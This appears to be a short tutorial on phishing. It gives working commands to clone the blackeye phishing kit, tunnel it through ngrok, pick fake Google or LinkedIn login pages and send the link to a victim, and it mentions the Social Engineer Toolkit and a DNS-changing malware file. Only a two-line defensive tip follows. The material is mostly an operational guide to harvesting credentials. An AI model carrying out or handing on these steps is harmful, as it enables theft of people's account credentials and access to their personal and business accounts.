Phishing Attack

It is one of the social engineering attacks to gain access to the victim personal or business account. Social engineering is the term used for a broad range of malicious activities accomplished through human interactions. It uses psychological manipulation to trick users into making security mistakes or giving away sensitive information.

Set up fake website

  1. Clone a github repository named blackeye.
    2. 
git clone https://github.com/An0nUD4Y/blackeye.git
cd blackeye
  2. Set up ngrok account via this link ngrok.com, and install (Getting Started → Setup & Installation → Download for Linux → Run commands,). 
    3. 
unzip ngrok-stable-linux-amd64.zip 
cp ngrok blackeye
./ngrok authtoken [personal_token]
./ngrok http 80
  3. Go to blackeye folder, and run it, 
    4. 
cd blackeye
sudo ./blackeye # option: 6 for google, 9 for linkedin
  4. See the running status in http://127.0.0.1:4040/status. Send the url to the victim.

Phishing emails, Smishing text or Vishing phone call

Here we can use social engineer toolkit (default in Kali Linux). You can send the fake link to the victim, or a file of malware to change DNS server which redirects you to another website.

How to protect yourself?

  1. Never click on links.
  2. Have a good spam filter in email.

References

  1. What is social engineering
  2. Github Repository: blackeye
  3. Github repository -- Social Engineer Toolkit